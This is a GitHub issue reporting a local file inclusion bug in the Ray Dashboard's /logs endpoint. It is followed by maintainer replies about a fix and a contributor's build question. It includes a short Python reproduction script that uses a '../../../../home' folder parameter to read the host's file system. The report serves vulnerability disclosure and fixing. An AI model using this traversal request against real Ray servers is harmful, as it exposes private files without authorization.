ray icon indicating copy to clipboard operation
ray copied to clipboard
verified publisher icon ray-project

Ray Dashboard is susceptible to a Local File Inclusion bug with default settings

Open rmhowe425 opened this issue 1 year ago • 5 comments

What happened + What you expected to happen

Description Just as the title suggests, when initially starting up the Ray dashboard I can parse my local file system by supplying the folder HTTP parameter in GET requests to the /logs API endpoint in conjunction with relative file paths.

Expected Behavior As a best practice, relative file paths should not be permitted, or should be ignored. Basic access controls should be implemented to prevent unauthorized users from being able to parse the underlying file system being used by Ray.

Useful Information

  1. Taking a cursory glance at the Ray GH Issues board, it appears that this issue was discussed (and addressed) here and here

  2. As seen in the provided script, the nodeId HTTP parameter must be included in GET requests.

image

Versions / Dependencies

2.9.1 and 2.23.0

Reproduction script

from requests import get

url = 'http://<ip address>:8265/#/logs' headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8', 'Accept-Encoding': 'gzip, deflate, br, zstd', }

params = {'folder': '../../../../home', 'nodeId': '<nodeId>' }

try: resp = get(url=url, params=params, headers=headers) except Exception as e: print(f'GET request failed: {str(e)}')

if resp.status_code != 200: print('ERROR server responded with: {resp.status_code}, {resp.content}') else: print(f'Response\n==========\n{resp.content}')

Issue Severity

Medium: It is a significant difficulty but I can work around it.

rmhowe425 avatar Jun 05 '24 12:06 rmhowe425

@anyscalesam Happy to try and submit a PR for this issue

rmhowe425 avatar Jun 20 '24 00:06 rmhowe425

@anyscalesam I'll go ahead and draft up a PR for this issue

rmhowe425 avatar Jun 26 '24 12:06 rmhowe425

@rmhowe425 Thanks for reporting and taking this issue. I assign the issue to you, but please feel free to drop the assignment if you decide not to commit the PR. Do you mind link back this issue when you post the PR?

brycehuang30 avatar Jun 26 '24 17:06 brycehuang30

@brycehuang30 Absolutely!

rmhowe425 avatar Jun 26 '24 17:06 rmhowe425

@brycehuang30 @anyscalesam Hey guys n00b question here.

I'm going through the Setting up your Development Environment instructions and I'm having some issues. I followed the instructions for Preparing to build Ray on Linux and I'm trying to run the command: pip install -e . --verbose

However, towards the very end of the build my RAM (16Gb) is maxed out and my computer freezes up. Surely I'm not the only one to experience this problem. Any suggestions on steps that I can take to optimize the build process so that I can push forward with my contribution for this GH issue?

rmhowe425 avatar Jun 29 '24 18:06 rmhowe425

Cc @aslonnie

anyscalesam avatar Jul 02 '24 23:07 anyscalesam